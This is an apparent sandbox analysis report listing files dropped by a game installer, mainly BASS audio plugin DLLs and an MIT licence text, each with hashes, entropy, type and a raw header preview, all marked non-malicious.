SSDEEP:	24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
MD5:	AF785965AB0BF2474B3DD6E53DA2F368
SHA1:	EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
SHA-256:	8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
SHA-512:	5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................\|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..\|;.......<..................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\CRTGame\bin\x86\copying (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
